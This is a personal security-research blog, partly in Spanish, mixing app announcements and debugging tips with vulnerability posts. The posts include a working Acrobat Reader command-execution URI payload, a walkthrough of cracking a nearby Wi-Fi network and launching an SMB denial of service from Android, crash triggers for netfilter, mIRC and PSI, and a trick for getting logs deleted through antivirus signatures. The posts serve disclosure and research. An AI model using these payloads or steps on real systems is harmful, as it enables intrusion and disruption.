software security blog

Oh, perdí mis bookmarks!

2012-01-28T21:47:00.005+01:00

Quien no ha perdido sus preciados bookmarks, y con ellos su clasificación en carpetas, descripciones personalizadas, tags, etc?

Cambiando de pc, o reinstalando el sistema, o desinstalando un navegador ...

Entonces la gente empezó a usar delicious, donde la única gracia es que por fin nunca más los vas a perder, y además van clasificados con un sistema de tagging, muy útil para encontrar las cosas.

Pues bien, tras la compra de de delicious por Yahoo, se perdieron grandes cantidades de datos de los usuarios, en primer lugar por tema legal, tenías que autorizarles en un plazo de tiempo o te los borraban, pero incluso gente que autorizó, también los perdió.

Bueno, en mi caso, durante varios años recolectando y clasificando bookmarks, para cuando los necesitara, pues todos perdidos o_O

Entonces, hice un sistema de bookmarks y lo dejé abierto, sin autenticación, la gente no entrará, pero si alguien lo visita y quiere guardar alguna url, pues puede usarlo.

http://labs.badchecksum.net/

Ya nunca más perderé mis bookmarks, quien quiera utilizarlos puede, quien quiera registrar nuevas urls tb puede.

La primera vez que buscas algo es mejor google, pero la segunda vez que quieres encontrar eso mismo, mejor buscarlo en el sistema de bookmarks.

He implementado un sistema de tagging, que acepta distancias levenshtein <= 1, y que analiza la web y auto-taggea para ayudarte a elegir los tags.

He implementado algunos filtros de sql injection, regexp injection y persistent XSS, porque seguro que mis colgas me lo "auditan" ;)

Os animo a probarlo.

Android SSHControl v1.0 relased!!!

2012-01-14T14:47:00.012+01:00

Hoy sabado 15, he subido al Market de Android la versión 1.0 de SSHControl, con nuevas funcionalades y la esperada opción "Custom Commands".

Esta aplicación permite controlar tus servidores linux, bsd y unix con solo un dedo, mediante esta app Android.
Y soluciona las siguientes problemáticas:
- Manejar una shell desde el pequeño teclado de un móvil es engorroso.
- Leer todos los resultados de un comando en la pantalla del móvil, nos dejamos la vista.

Esta app permite interactuar con servidores remotos simplemente haciendo pulsaciones en la pantalla, mediante un explorador de ficheros, de conexiones, etc..

Las funcionalidades nuevas de esta versión 1.0 son:

- Administración del Firewall Iptables.
- Opción de Custom Commands, tal como había prometido.

Las funcionalidades ya presentes en la v0.8 son:

- escalada a root mediante su y sudo
- gestor de procesos
- explorador de ficheros, editor de ficheros, editor de permisos.
- monitorización y baneo de conexiones
- Visualizadores de logs
- administrador de drivers
- estadisticas de disco

Para la versión 2.0 preveo:

- Escuchar música remota
- Descarga de ficheros (wget)
- Transferencia segura de ficheros entre servidores (scp)
- Gestures, para administrar los sitemas en plan minority report :)

App disponible en el market para 861 tipos de dispositivos y pronto disponible en tablets.

https://market.android.com/details?id=net.ssh.SSHControl

Cualquier sugerencia de mejora: sha0 [4t] badchecksum [d0t] net

Administración remota de servidores desde Android

2011-11-20T13:55:00.006+01:00

Sería muy util poder administrar todos nuestros servidores desde la palma de la mano.

Sin embargo una shell linux, no es viable en el teclado de un teléfono incluso de un tablet, sobretodo porque hay que escribir muchos símbolos, por ejemplo el guión, y estos teclados están pensados más bien para texto.

Pues bien, de esta necesidad surgió la aplicación SSHControl:

SSHControl

Esta problematica la he solucionado a base de utilizar nevegadores y estructurar los outputs para no acumular excesiva información en la pantalla.

- Navegador de ficheros
- Navegador de procesos
- Navegador de conexiones
- Navegador de logs
- Navegador de drivers de kernel

Esto permite administrar múltiples servidores con un solo dedo :)

Controlar la seguridad de sus servidores ahora es bastante sencillo y ágil, por ejemplo con solo hacer un "tap" encima de un usuario, podemos ver sos procesos asociados, con hacer otro tap en un proceso podemos kilearlo, ver mas info etc ..
Con hacer un tap encima de una apliacción, vemos sus conexiónes, con un tap en una conexión podemos agregar una regla de filtrado en el firewall, etc ..

En la siguiente versión habilitaré la opción de "Custom Commnands", la cual es muy util,
cada administrador o usuario linux, tiene una serie de comandos que repite con mucha frecuencia,
bien pues esta opción permite pre-programar estos comandos habituales, de manera que puedes lanzarlos con un simple tap.

En el roadmap tengo pensadas nuevas funcionalidades muy útiles :)

Aqui os dejo algunas capturas de pantalla:

Resolución de ExpedientesX de código

2011-07-01T13:04:00.005+02:00

Hoy me he topado con algo bastante gracioso que puede liarte unos minutos:

python
>>> import re
>>> a='owjf oasijf aw0oifj osfij 4.4.4.4 oasidjfowefij 192.168.1.1'

ok, pues ahora copy-pasteais cada una de estas:
re.findall('[0-9]̣̣',a)
re.findall('[0-9]',a)

Son exactamente iguales, pero si paseteais una da resultados diferente a si pasteais la otra :)

Pasteamos la primera:
>>> re.findall('[0-9]̣̣',a)
[]

Pasteamos la segunda:
>>> re.findall('[0-9]',a)
['0', '4', '4', '4', '4', '1', '9', '2', '1', '6', '8', '1', '1']

o_O, he repasado caracter a caracter y son visualmente iguales, si mirais en un editor hexa vereis que realmente no lo son, lógicamente no se trata de un expedienteX.

La cuestion es que según la fuente que tengais, debajo de la comilla o debajo del ] hay un punto microscópico :)

Esto es como cuando me emparanoie de que gmail cuando llevas un rato escribiendo un email y se hace auto-save, aparece una especie de acento raro en la pantalla :)

En estos casos, la metodología tipica de copypastear un trozo de la primera sentencia con el resto de la segunda sentencia, te lleva a los 2 caracteres que varían, pero no aprecias (segun la fuente que tengas) la diferéncia.

6572 662e 6e69 6164 6c6c 2728 305b 392d cc5d cca3 27a3 612c 0a29
6572 662e 6e69 6164 6c6c 2728 305b 392d 275d 612c 0a29

Son dígitos unicode, sabe Dios de que pais, y sabe Dios también como los escribí con mi teclado,
se me ocurren bromas de código fuente que se pueden hacer con esto :D, pero vamos, si tenemos metodología de reaccién ante expedientesX, sobretodo aquello de divide y vencerás dicotómico, en pocos minutos se resuelven este tipo de problemas.

Android WarStrategy

2011-06-27T21:18:00.005+02:00

Well,
this post is not about security,
when I was 12 I liked to code games in spectrum and later on pc,
3 months ago, in my limited free time, I decided to code some android games,
this is the first one, a funny arcade battle-game about tanks and rocket launchers.

Android Arcade War Game

This is the main logo of the game:

This is a promotional pic:

And this is one of the several tank and missile launchers I drawed with gimp:

I expect you enjoy with this game.

Hacking From Android

2011-02-22T13:16:00.006+01:00

The first step is crack a close wifi network with WifiCrack or similar:

See the app here

Next, we can perform a portscan with AndroScan:

See AndroScan Here

Once you have identified livesystems and their udp and tcp services, you can connect to the services detected with several applications, or launch a DoS attack, I have ported the SMB DoS exploit to Android, it can be installed from here:

VistaDoS.apk

Happy hacking from Android.

PSI remote integer overflow

2008-12-29T10:15:00.006+01:00

I once scanned myself from internet, and 8010/tcp port was detected.
my PSI jabber file transfer service was exposed to internet.

Then I fuzz this service and found a nice DoS.

A signed integer check lets crash remote PSI's and I think is not possible to overflow the heap, becouse the destination buffer is reallocated to the same amount of bytes to be copied.

I have reported it to the coders, and then they give me the ok to launch the advisory:

advisory
exploit

Be aware with the services you are exposing to internet, and be aware with your client applications (browser, jabber, msn, email client ..)

code has bugs ;)

Ksec - my Linux Defense System

2008-12-01T13:29:00.007+01:00

Kernel viruses/rootkits are dificult to detect, but admins change the kernel frequently and the attacker loose the rootkit.

People infect user-space, and pre-root attacks are also in user-space, then a system to log user-space dangerous activities will be very useful.

A year ago I coded a defense system that is now public.
Is simple but useful, I hook open, socketcall, execve and unlink, for example if your "ls" is connecting to internet you will see:

Dec 1 13:44:51 hostname kernel: ls CONNECT(80.33.158.80:1337 fam:2)

If your ls Opening for writting:

Dec 1 13:44:25 pwn3d kernel: ls OPEN(/dev/.shm/.sniff w)

try the Defense System here

Mirc 6.34(last) Remote Overflow

2008-10-03T15:47:00.007+02:00

When a PRIVMSG arrives, the vulnerable function is called to copy the nickname to a buffer:

let's see the pseudocode of the call: (dest, bytes to copy, src)

Let's see the vulnerable memory zero fill:

ESI is the "bytes to copy", we dont jump becouse is greatter than 10, and then ...
the first rep start to copy 0x00 at [edi++] ecx times (309 times) then we write in other vars and out of the page.

Explotation vector: the nick, well, you must be the server becouse servers dont allow large nicknames. (a privmsg with a 315 bytes nick -> DoS)

gdb seek macros

2008-07-15T12:26:00.002+02:00

I have coded some basic but useful gdb macros for searching strings and addresses.

get it here:my .gdbinit

Here is a bzip2 compressed mpeg video: demo

Usage:
with this macros, $base in your gdb by default is 0x08048000

(gdb) gob --> execute step by step until get in a 0x0804**** addr (or other $base)

(gdb) seek $base "hello" --> seek hello from $base to $base+0xffff
$1 = "found:"
$2 = 0x8048480
$3 = "found:"
$4 = 0x8049480
$5 = "found:"
$6 = 0x804a008
^C

(gdb) seekRef $base 0x8048480 --> Seek addreses who point to 0x8048386 address
--> in this case ptrs that point to "hello" address
$7 = "found"
$8 = 0x80485a0
$9 = "found"
$10 = 0x80495a0
^C

(gdb) seekRef $base 0x80485a0 --> let's
(gdb) seekRef $base 0x80495a0
$11 = "found"
$12 = 0x8048386
$13 = "found"
$14 = 0x8049386
^C

NOTE: the macros can be stoped with ^C, they don't stop at first occurrence.
TODO: Identify sections (by now can be done manually with (gdb)main info sect)

Erasing or Blocking logs remotelly

2008-06-25T15:08:00.005+02:00

Monday I dreamt some new web-hacking techniques, now I only remember one:

If you write in the url an eicar, loveletter or any virus fingerprint, the antivirus blocks or deletes the log files, or also the logfile can be sended to the AV company if you write a suspicious pattern.

ex: http://web.com/index.php?<virus pattern>

What about inserting in BD this patterns? If you register in a web, and submit the pattern in de BD, maybe some BD files will be blocked or deleted by the antivirus.

This also can be a vector to exploit some local AV flaws.

NOTE: only Panda detects eicars that are not at the beginning of the file, must use other patterns.

Linux remote null pointer derreference (CVE-2007-2876)

2008-06-16T15:52:00.005+02:00

The linux netfilter connection tracking new_state() function has a vulnerability exploitable remotelly.

sctp_new();

newconntrack = new_state(IP_CT_DIR_ORIGINAL, SCTP_CONNTRACK_NONE, sch->type);
if (newconntrack == SCTP_CONNTRACK_MAX) {
pr_debug("nf_conntrack_sctp: invalid new deleting.\n");
return 0;
}

Max is not allowed, conntrack_none shouldn't be allowed too.

conntrack->proto.sctp.state = newconntrack;

State will be zero.

sctp_packet() for returning the veredict of the packet, take the state 0:

oldsctpstate = conntrack->proto.sctp.state;
newconntrack = new_state(CTINFO2DIR(ctinfo), oldsctpstate, sch->type);

And then give a null ptr:
nf_ct_refresh_acct(conntrack, ctinfo, skb, *sctp_timeouts[newconntrack]);

becouse sctp_timeouts[SCTP_CONNTRACK_NONE ] is null, it has not a callback:

static unsigned int * sctp_timeouts[]
= { NULL, /* SCTP_CONNTRACK_NONE */
&nf_ct_sctp_timeout_closed, /* SCTP_CONNTRACK_CLOSED */
&nf_ct_sctp_timeout_cookie_wait, /* SCTP_CONNTRACK_COOKIE_WAIT */
&nf_ct_sctp_timeout_cookie_echoed, /* SCTP_CONNTRACK_COOKIE_ECHOED */
&nf_ct_sctp_timeout_established, /* SCTP_CONNTRACK_ESTABLISHED */
&nf_ct_sctp_timeout_shutdown_sent, /* SCTP_CONNTRACK_SHUTDOWN_SENT */
&nf_ct_sctp_timeout_shutdown_recd, /* SCTP_CONNTRACK_SHUTDOWN_RECD */
&nf_ct_sctp_timeout_shutdown_ack_sent /* SCTP_CONNTRACK_SHUTDOWN_ACK_SENT */
}

To exploit this you have to create:
socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)
and set the sockopt SCTP_STATUS to zero.

Becouse of this option is read only, you will need to construct the raw sctp packet :)

The victym must have a SCTP service, and the oops probably doensnt crash the system.

kernel hacking

2008-06-08T23:55:00.005+02:00

[will be translated]
He no he probado todos los kernel debuggers para linux, pero lo mas decente que he encontrado para representar las estructuras es ddd conectado por tap0 al qemu en modo -s.

1. Bajar fuentes del kernel a depurar

En el kernel activaremos la compatibilidad .config
Como que depuraremos ese kernel bajo qemu, podemos tener todas las opciones de debug activadas, princincipalmente estas.

.config
CONFIG_DEBUG_KERNEL=y
CONFIG_DEBUG_BUGVERBOSE=y
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_STACKOVERFLOW=y
CONFIG_DEBUG_PAGEALLOC=y

compilaremos con make

2. Necesitamos generar un image.img con dd, formateamos (por ej ext2) y creamos un subsitema linux por ej con un debian debootstrap :)

la montamos:
modprobe loop
mount image.img img/ -o loop

si no carga el driver loop fijo k lo tienes, buscalo ;)

3. qemu

Tenemos la imagen de disco image.img, el kernel comprimido bzImage y sin comprimir vmlinux
Botamos qemu con la imagen de disco y el bzImage

qemu -boot c -kernel linux-2.6.*.*/arch/i386/boot/bzImage -hda ./image.img -append "root=/dev/hda clock=pit" -s

el -s es el modo kernel debug por el puerto 1234

4. ddd o gdb

ddd tiene la ventaja que podremos dibujar las estructuras.

Arrancamos el ddd con el vmlinux recien compilado. (no sirve bzImage)
ddd vmlinux

(gdb) target remote localhost:1234

vamos a chequearlo:
(gdb) b sys_open
(gdb) c

probamos por ej un simple ls que invocara la syscall open

Ahora con el ddd podremos displayar cualquier estructura por ej:

kernel developer sha0wiki

sha0proxy v1 released

2008-05-30T15:26:00.010+02:00

I have implemented new features to my multiprotocol proxy, you can get it from:

sha0proxy.pl

Imagine you want to see and interact with the communication between a client and server, with sha0proxy you can take control or automate replacements.

By now only TCP is available.

Samples:

1. I want to see the communication

./sha0proxy.pl 445 fileserver 445 view
./smbclient -L 127.0.0.1

I will see the number of current packet
If the client send to server: >>>>>
If the server send to client: <<<<<
And colorized data:

1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 21 ..............A!
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

...

2. I wish to interfere in trafic flow at runtime

./sha0proxy.pl 445 filserver 445 trap
./smbclient -L 127.0.0.1

1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 24 ...............$
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

where>
what>

I have pressed enter enter, don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 48 86 f7 12 01 02 ........*.H.....
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

where>07a
what>AAAAA\x00

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 41 41 41 41 41 00 ........*.AAAAA.
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

I have writed at 0x0a1 the AAAAA\x00 value and send the packet changed.
Note that I don't accept \0 nor \x0, (you have to put two hex digit and the x)
Note that sha0proxy show us again the second packet, but witch the changes applied.

3. I wish to make only one change quickly :)

/sha0proxy.pl 445 filserver 445 trap 2 07a 'AAAAA\x00'
./smbclient -L 127.0.0.1

Note that i called sha0 proxy with 3 extra params, the number of packet to modify, offset and value (please use '' in strange params)

1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 24 ...............$
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

where>
what>

Y have pressed enter enter, don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 48 86 f7 12 01 02 ........*.H.....
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

where>
what>

Y have pressed enter enter, don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 41 41 41 41 41 00 ........*.AAAAA.
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

I pressed enter, but in commandline i programed changes at second packet, we can see 07a

4. I wish to make many changes or write an exploit

cat > smbHeapBof
#This is not a real exploit
#but could be ;)
#

03 07a AAAAA\x00

#I can separate with one space or tab
#I can put comments
#I cant use \0 or \x0 the only alowed format is hexa \x00
^C

/sha0proxy.pl 445 filserver 445 trap smbHeapBof
./smbclient -L 127.0.0.1

1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 be ff 53 4d 42 72 00 00 00 00 08 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 24 ...............$
020|00 00 01 00 00 9b 00 02 50 43 20 4e 45 54 57 4f ........PC NETWO
030|52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 RK PROGRAM 1.0..
040|4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 MICROSOFT NETWOR
050|4b 53 20 31 2e 30 33 00 02 4d 49 43 52 4f 53 4f KS 1.03..MICROSO
060|46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 FT NETWORKS 3.0.
070|02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e .LANMAN1.0..LM1.
080|32 58 30 30 32 00 02 44 4f 53 20 4c 41 4e 4d 41 2X002..DOS LANMA
090|4e 32 2e 31 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 N2.1..LANMAN2.1.
0a0|02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 .Samba..NT LANMA
0b0|4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 N 1.0..NT LM 0.1
0c0|32 00 2.

where>
what>

Y have pressed enter enter, don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 48 86 f7 12 01 02 ........*.H.....
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

where>
what>

Y have pressed enter enter, don't want to change anything.

2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |
---+------------------------------------------------+---
000|00 00 00 b6 ff 53 4d 42 72 00 00 00 00 88 01 c8 .....SMBr.......
010|00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 24 ...............$
020|00 00 01 00 11 09 00 07 32 00 01 00 04 41 00 00 ........2....A..
030|00 00 01 00 00 00 00 00 fd f3 01 80 ae a3 02 87 ................
040|5b c2 c8 01 88 ff 00 71 00 88 c2 e4 e7 1d a3 83 [......q........
050|47 91 34 83 bf b4 7d ce b5 60 5f 06 06 2b 06 01 G.4...}..`_..+..
060|05 05 02 a0 55 30 53 a0 30 30 2e 06 09 2a 86 48 ....U0S.00...*.H
070|82 f7 12 01 02 02 06 09 2a 86 41 41 41 41 41 00 ........*.AAAAA.
080|02 06 0a 2a 86 48 86 f7 12 01 02 02 03 06 0a 2b ...*.H.........+
090|06 01 04 01 82 37 02 02 0a a3 1f 30 1d a0 1b 1b .....7.....0....

I pressed enter, but in the file have programed changes at second packet, we can see 07a

5. I want to make an exploit file for sha0proxy, but with no interaction, i dont want press enter any time.

No problem, use view mode.

/sha0proxy.pl 445 filserver 445 view file
./smbclient -L 127.0.0.1

6. I have the server and client in my box, cant use the same port for server and sha0proxy :/

you mus use ip aliasing

ifconfig eth0:1 up
ifconfig eth0:1 up

listen the server in ip1 (eth0) and sha0proxy in ip2, the client attack to ip2.

EOF

Interesting "feature" of AcroRead

2008-04-24T17:34:00.005+02:00

Acroread8 is vulnerable to a command execution, is possible at URI tag, to make a local path to the file you want to be executed.
get the exploit
This exploit executes the windows calculator, but it can be modified easily:


00000f30  20 6f 62 6a 0d 3c 3c 2f  55 52 49 28 6d 61 69 6c  | obj.<</URI(mail|
00000f40  74 6f 3a 74 65 73 74 25  2e 2e 2f 2e 2e 2f 2e 2e  |to:test%../../..|
00000f50  2f 2e 2e 2f 2e 2e 2f 2e  2e 2f 2e 2e 2f 2e 2e 2f  |/../../../../../|
00000f60  77 69 6e 64 6f 77 73 2f  73 79 73 74 65 6d 33 32  |windows/system32|
00000f70  2f 63 61 6c 63 2e 65 78  65 22 2e 63 6d 64 29 2f  |/calc.exe".cmd)/|
<</URI(mailto:test%../../../../../../../../windows/system32/calc.exe".cmd)/S/URI>>

Conclusion: don't trust in any file given from unknown people :)

Rsync remote code execution

2008-04-14T11:52:00.012+02:00

Rync service with xattr support is vulnerable to a remote code execution in versions between 2.6.9 and 3.0.1


--- a/util.c
+++ b/util.c
@@ -1329,7 +1329,7 @@ void *_new_array(unsigned long num, unsigned int size, int use_calloc)
  return use_calloc ? calloc(num, size) : malloc(num * size);
 }
 
-void *_realloc_array(void *ptr, unsigned int size, unsigned long num)
+void *_realloc_array(void *ptr, unsigned int size, size_t num)
 {
  if (num >= MALLOC_MAX/size)
   return NULL;
@@ -1550,7 +1550,10 @@ void *expand_item_list(item_list *lp, size_t item_size,
    new_size += incr;
   else
    new_size *= 2;
-  new_ptr = realloc_array(lp->items, char, new_size * item_size);
+  if (new_size < lp->malloced)
+   overflow_exit("expand_item_list");
+  /* Using _realloc_array() lets us pass the size, not a type. */
+  new_ptr = _realloc_array(lp->items, item_size, new_size);
   if (verbose >= 4) {
    rprintf(FINFO, "[%s] expand %s to %.0f bytes, did%s move\n",
     who_am_i(), desc, (double)new_size * item_size,

1. size_t

First there is the check if (num >= MALLOC_MAX/size)
num*size has to be less than MALLOC_MAX

Have this check a sign problem?

rsync.h redefines size_t to unsigned int, there is not problem, and xattr patch doesn't change this to a signed one.

There is not sign problem here.

2. new_size < malloced

+ if (new_size < lp->malloced)
Now is not possible use this realloc to reduce the heap variable lp->items!!!

3. supply the fixed size instead of the type char

char should *1 I dont think this was a problem.

- new_ptr = realloc_array(lp->items, char, new_size * item_size);
+ new_ptr = _realloc_array(lp->items, item_size, new_size);

The first will use a macro to do:
_realloc_array (ptr, sizeof(char), new_size*item_size)

rsync.h:#define realloc_array(ptr, type, num) ((type*)_realloc_array((ptr), sizeof(type), (num)))

The second will realloc item_size*new_size

The Problem

Then, the problem seems the reduction of size, that was not controlled and lets overflow the lp->items array.

The Explotation

More details about explotation, soon.

PokerStars Security

2008-04-10T16:56:00.006+02:00

In this video we can see that the code is making a tcp connection to 77.87.178.66 The SSL crypted connection to 445 can be redirected to my sha0proxy.pl

PokerStars communication is secure bescause they check the certificates.

